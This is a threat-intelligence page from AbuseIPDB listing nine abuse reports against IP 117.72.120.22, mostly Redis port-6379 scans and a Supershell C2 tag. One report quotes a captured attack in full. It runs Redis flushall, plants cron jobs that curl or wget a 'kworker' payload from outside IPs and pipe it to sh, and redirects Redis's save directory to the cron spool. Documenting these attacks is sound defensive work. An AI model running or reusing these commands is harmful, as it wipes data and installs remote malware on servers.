AbuseIPDB » 117.72.120.22
117.72.120.22
This IP was reported 9 times. Confidence of
Abuse
is 0% : ?
ISP
Beijing Jingdong 360 Degree E-commerce Co., Ltd.
Usage Type
Fixed Line ISP
ASN
AS141679
Domain Name
jd.com
Country
๐จ๐ณ
China
City
Tianjin, Tianjin
IP info including ISP, Usage Type, and Location provided
by IPInfo . Updated weekly.
IP Abuse Reports for 117.72.120.22 :
This IP address has been reported a total of
9
times from
9 distinct
sources.
117.72.120.22 was first reported on
October 11th 2025 , and the most recent report was
3 months ago
Old Reports:
The most recent abuse report for this IP address is from
3 months ago
Reporter
IoA Timestamp (UTC)
Comment
Categories
๐ฌ๐ท
Xev
2026-03-02 21:27:06
(3 months ago)
Redis command execution
Date: 2026-02-28 08:54:42 UTC
Destination port: 6379
Executed commands:
fl ...
show more
Redis command execution
Date: 2026-02-28 08:54:42 UTC
Destination port: 6379
Executed commands:
flushall
set
backup1
*/2 * * * * cd1 -fsSL http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh
set
backup2
*/3 * * * * wget -q -O- http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh
set
backup3
*/4 * * * * curl -fsSL http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh
set
backup4
*/5 * * * * wd1 -q -O- http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh
config
set
dir
/var/spool/cron/
config
set
dir
/var/spool/cron/crontabs
flushall
set
backup1
*/2 * * * * root cd1 -fsSL http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh
set
backup2
*/3 * * * * root wget -q -O- http://34.70.205.211/plugins-dist/safehtml/lang/font/kworker | sh
set
backup3
*/4 * * * * root curl -fsSL http://38.150.0.118/dewfhuewr4r89/98hy67//kworker | sh
set
backup4
*/5 * * * * root wd1 -q -O- http://34.70.205.211...
show less
IoT Targeted
๐ฏ๐ต
jay hung
2026-03-01 07:04:03
(3 months ago)
2026-03-01T07:03:59.922543+00:00 quarktech kernel: [1277408.424968] [UFW BLOCK] IN=eth0 OUT= MAC=22: ...
show more
2026-03-01T07:03:59.922543+00:00 quarktech kernel: [1277408.424968] [UFW BLOCK] IN=eth0 OUT= MAC=22:00:92:2e:84:93:fe:ff:ff:ff:ff:ff:08:00 SRC=117.72.120.22 DST=172.237.29.33 LEN=60 TOS=0x00 PREC=0x00 TTL=41 ID=62873 DF PROTO=TCP SPT=43000 DPT=4444 WINDOW=28200 RES=0x00 SYN URGP=0
...
show less
Port Scan
๐ณ๐ฑ
VMHeaven.io
2026-02-28 23:42:05
(3 months ago)
Blocked by UFW [6379/tcp]
Source port: 44816
TTL: 48
Packet length: 60
Port Scan
๐ฉ๐ช
guldkage
2026-02-28 18:27:21
(3 months ago)
Unauthorized connection attempt detected from IP address 117.72.120.22 to port 6379 (ger-02) [REDIS]
Exploited Host
๐ฉ๐ช
centurion
2026-02-28 16:58:49
(3 months ago)
Blocked by UFW on ns02 [6379/tcp] Source port: 44672 TTL: 49 Packet length: 60 TOS: 0x00 This repor ...
show more
Blocked by UFW on ns02 [6379/tcp] Source port: 44672 TTL: 49 Packet length: 60 TOS: 0x00 This report was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter
show less
Port Scan
๐ธ๐ฐ
GOVCERT
2026-02-28 13:13:25
(3 months ago)
Sweep Scan
Port Scan
๐จ๐ญ
cybsecaoccol
2026-02-28 12:57:28
(3 months ago)
multiple malicious connection attempts on tcp port 6379 - sch
DDoS Attack
Port Scan
Hacking
Brute-Force
๐ฉ๐ช
_ArminS_
2026-02-28 09:40:02
(3 months ago)
SP-Scan 50192:6379 detected 2026.02.28 10:40:02
blocked until 2026.04.19 04:42:49
Port Scan
๐ธ๐ฆ
MeduzaCTI
2025-10-11 07:08:08
(8 months ago)
Indicator Report
Indicator: 117.72.120.22
Reporter: HeatherMason
Description: Supershell C2 Detecte ...
show more
Indicator Report
Indicator: 117.72.120.22
Reporter: HeatherMason
Description: Supershell C2 Detected
Tags: Supershell,Malware,C2
Source: Meduza CTI Platform
Reference: https://meduzacti.com
show less
Hacking
Showing 1 to
9
of 9 reports
Think this IP has been falsely reported? You may request to have the associated
reports reviewed and removed.
Request Takedown ๐ฉ
Recently Reported IPs: